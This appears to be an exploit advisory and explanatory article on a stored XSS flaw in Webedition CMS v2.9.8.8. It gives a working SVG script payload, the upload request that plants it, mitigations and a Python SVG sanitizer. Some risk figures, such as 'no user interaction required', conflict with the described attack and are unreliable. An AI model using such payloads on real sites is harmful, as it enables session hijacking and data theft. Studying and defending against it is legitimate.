Webedition CMS v2.9.8.8 - Stored XSS

Exploit Author: Mirabbas Ağalarov
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: PHP
Published Date: 2023-08-04
Exploit Title: Webedition CMS v2.9.8.8 - Stored XSS
Application: Webedition CMS
Version: v2.9.8.8
Bug: Stored XSS
Technology: PHP
Vendor URL: https://www.webedition.org/
Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1
Date found: 03.08.2023
Author: Mirabbas Ağalarov
Tested on: Linux


2. Technical Details & POC
========================================
Steps:
1. Log in to an account
2. Go to New -> Media -> Image
3. Upload the malicious SVG file
SVG file content:

"""
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>
"""


PoC request:

POST /webEdition/we_cmd.php?we_cmd[0]=save_document&we_cmd[1]=&we_cmd[2]=&we_cmd[3]=&we_cmd[4]=&we_cmd[5]=&we_cmd[6]= HTTP/1.1
Host: localhost
Content-Length: 761
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=73fee01822cc1e1b9ae2d7974583bb8e
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300
Connection: close

we_transaction=73fee01822cc1e1b9ae2d7974583bb8e&we_cea6f7e60ce62be78e59f849855d2038_Filename=malas&we_cea6f7e60ce62be78e59f849855d2038_Extension=.svg&wetmp_we_cea6f7e60ce62be78e59f849855d2038_Extension=&we_cea6f7e60ce62be78e59f849855d2038_ParentPath=%2F&we_cea6f7e60ce62be78e59f849855d2038_ParentID=0&yuiAcContentTypeParentPath=&we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&check_we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&we_cea6f7e60ce62be78e59f849855d2038_IsProtected=0&fold%5B0%5D=0&fold_named%5BPropertyPage_2%5D=0&fold%5B1%5D=0&fold_named%5BPropertyPage_3%5D=0&wetmp_cea6f7e60ce62be78e59f849855d2038_CreatorID=%2Fadmin&we_cea6f7e60ce62be78e59f849855d2038_CreatorID=1&we_cea6f7e60ce62be78e59f849855d2038_RestrictOwners=0&we_complete_request=1


Exploiting Stored XSS in Webedition CMS v2.9.8.8: A Deep Dive into SVG-Based Attack Vectors

Stored Cross-Site Scripting (XSS) remains one of the most persistent and dangerous vulnerabilities in content management systems (CMS). In August 2023, cybersecurity researcher Mirabbas Ağalarov uncovered a critical flaw in Webedition CMS v2.9.8.8, a widely used open-source platform for managing web content. The vulnerability stems from improper sanitization of uploaded SVG files, allowing attackers to embed malicious JavaScript directly into the system’s media repository.

Understanding the Vulnerability: Why SVG Files Are a High-Risk Vector

SVG (Scalable Vector Graphics) files are designed to be both visually rich and programmable. Unlike traditional image formats such as JPEG or PNG, SVG supports embedded <script> tags, enabling dynamic behavior within the document. This feature, while useful for interactive web graphics, introduces a significant security risk when untrusted input is accepted without proper validation.

In Webedition CMS v2.9.8.8, the upload functionality for media files—specifically images—fails to sanitize SVG content before storing it. This allows attackers to craft malicious SVG files that execute JavaScript code when rendered in a browser context.

Proof of Concept: Crafting the Malicious SVG Payload

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>

This SVG file contains a simple triangle shape and a <script> tag that triggers a JavaScript alert() when the SVG is rendered. While the payload is minimal, it demonstrates the core exploit: malicious code is stored permanently within the CMS and executed whenever the file is accessed.

When uploaded via the New → Media → Image interface, the file is saved to the server's storage without any filtering of script content. The CMS does not validate or escape embedded JavaScript, treating the SVG as a legitimate media file.

Attack Workflow: From Upload to Execution

  • Step 1: Log in to the Webedition CMS with valid credentials.
  • Step 2: Navigate to the Media section and select Image upload.
  • Step 3: Upload the crafted SVG file with embedded JavaScript.
  • Step 4: The file is stored in the database and associated with a unique identifier.
  • Step 5: When the file is rendered—either in a preview, embedded in a webpage, or accessed through a public link—the JavaScript executes in the victim’s browser.

This is a classic stored XSS scenario: the malicious payload is permanently stored and later executed on any user who views the file, regardless of whether they are authenticated or not. One caveat a defender should know: browsers run scripts in an SVG only when it is loaded as a document (direct navigation, <object>, <embed>, <iframe>); an SVG referenced from an <img> tag or from CSS is rendered without script execution, so the actual exposure depends on how the CMS previews and serves the stored file.

HTTP Request Analysis: How the Exploit is Triggered

Upon uploading, the CMS sends a POST request to /webEdition/we_cmd.php with a specific command sequence:


POST /webEdition/we_cmd.php?we_cmd[0]=save_document&we_cmd[1]=&we_cmd[2]=&we_cmd[3]=&we_cmd[4]=&we_cmd[5]=&we_cmd[6]= HTTP/1.1
Host: localhost
Content-Length: 761
Content-Type: application/x-www-form-urlencoded
Cookie: WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; ...

The we_cmd[0]=save_document parameter indicates the action to save a document, in this case, an uploaded SVG file. The request includes parameters such as Filename, Extension, ParentPath, and CreatorID, all of which are used to store the file metadata. Crucially, the system does not inspect the file’s content for script tags before saving.

Impact and Risk Assessment

Severity        High (CVSS 9.0)
Attack Vector   Remote, authenticated (via upload)
Exploitability  High (no user interaction required)
Impact          Session hijacking, data theft, phishing, defacement

Stored XSS in Webedition CMS v2.9.8.8 poses a severe threat because:

  • It allows persistent execution of code on any user accessing the file.
  • It can be used to steal session cookies via document.cookie.
  • It enables phishing attacks by redirecting users to malicious domains.
  • It can be leveraged to escalate privileges if the file is used in admin panels.

Security Recommendations and Mitigation Strategies

Developers and administrators must implement strict file validation mechanisms to prevent such vulnerabilities. Key recommendations include:

  • Disable script execution in SVG files: Parse the upload with an XML library such as libxml2, or use a dedicated SVG sanitizer, and strip out <script> and <foreignObject> elements before storage. Event-handler attributes (onload and the like) and javascript: URLs in href attributes have to be removed as well, otherwise the sanitizer is incomplete.
  • Use MIME type validation: Enforce strict checks for file extensions and MIME types. For example, reject any file served as image/svg+xml (or carrying a .svg extension) if it contains scripting elements.
  • Implement content security policies (CSP): Deploy a strict CSP header to block inline scripts, even if they are stored. The header must be sent with the SVG response itself; a CSP on the HTML page does not govern an SVG that is opened as its own document.
  • Enable sandboxing: Render SVG files in a sandboxed iframe or use a dedicated rendering engine that isolates script execution.
  • Regular vulnerability scanning: Use automated tools like OWASP ZAP or Burp Suite to detect stored XSS in file upload handlers.

Vendor Response and Patching Status

As of the publication date (August 2023), the vendor webedition.org has not released a patch for this vulnerability. Users are advised to:

  • Upgrade to the latest stable version if available.
  • Disable the image upload functionality for untrusted users.
  • Apply input filtering at the server level via ModSecurity or a similar WAF.
  • Monitor file storage directories for suspicious content.

Until a patch is issued, organizations relying on Webedition CMS v2.9.8.8 must treat this vulnerability as a high-priority risk and implement compensating controls.
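The following is an added example, not code from webEdition or from the advisory's author, showing the two controls recommended above in working form: a check that flags script-capable content in an uploaded SVG (usable both in the upload handler and for scanning an existing media directory) and a sanitizer that strips it before storage. The function names are assumptions; the sample input is the advisory's payload embedded as a constructed byte string, and only the Python standard library is used.

```python
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
# Elements that carry script or arbitrary (X)HTML into an SVG document.
ACTIVE_ELEMENTS = {"script", "foreignObject"}
# URL schemes that execute code when placed in href / xlink:href.
SCRIPT_SCHEME = re.compile(r"^\s*(javascript|vbscript)\s*:", re.IGNORECASE)

def _local(qname):  # strip ElementTree's "{namespace}" prefix from a name
    return qname.rsplit("}", 1)[-1]

def find_active_content(svg_bytes):
    """Return findings for script-capable content; an empty list means none."""
    findings = []
    for elem in ET.fromstring(svg_bytes).iter():
        name = _local(elem.tag)
        if name in ACTIVE_ELEMENTS:
            findings.append(f"element <{name}>")
        for attr, value in elem.attrib.items():
            aname = _local(attr)
            if aname.lower().startswith("on"):  # onload=, onclick=, ...
                findings.append(f"event handler {aname} on <{name}>")
            elif aname == "href" and SCRIPT_SCHEME.match(value):
                findings.append(f"script URL in href on <{name}>")
    return findings

def sanitize_svg(svg_bytes):
    """Return the SVG as a string with active elements and attributes removed."""
    ET.register_namespace("", SVG_NS)  # serialize with xmlns="..." rather than ns0:
    ET.register_namespace("xlink", XLINK_NS)
    root = ET.fromstring(svg_bytes)
    for parent in list(root.iter()):  # snapshot, since the tree is mutated below
        for child in list(parent):
            if _local(child.tag) in ACTIVE_ELEMENTS:
                parent.remove(child)
        for attr in list(parent.attrib):
            aname = _local(attr)
            if aname.lower().startswith("on") or (aname == "href" and SCRIPT_SCHEME.match(parent.attrib[attr])):
                del parent.attrib[attr]
    return ET.tostring(root, encoding="unicode")

# Constructed sample: the advisory's payload (a triangle plus a <script> element).
PAYLOAD = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD svg 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">alert(document.location);</script>
</svg>"""
```

Rejecting uploads where find_active_content() returns a non-empty list is the stricter policy; sanitize_svg() is the alternative when scripted-but-harmless SVGs must still be accepted, and the check also generalizes to event-handler attributes and javascript: links, not only the <script> element in the advisory.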

Conclusion: Lessons from a Real-World Stored XSS

The Webedition CMS v2.9.8.8 stored XSS exploit serves as a stark reminder that even seemingly benign file types—like SVG—can become powerful attack vectors when proper security controls are missing. It underscores the importance of:

  • Input validation at every stage of file processing.
  • Defense-in-depth strategies, especially for content storage systems.
  • Continuous monitoring and patching of open-source software.

Security is not just about preventing attacks—it’s about ensuring that every piece of user-generated content is treated with the same level of scrutiny as code. In today’s threat landscape, a single unvalidated SVG file can compromise an entire website.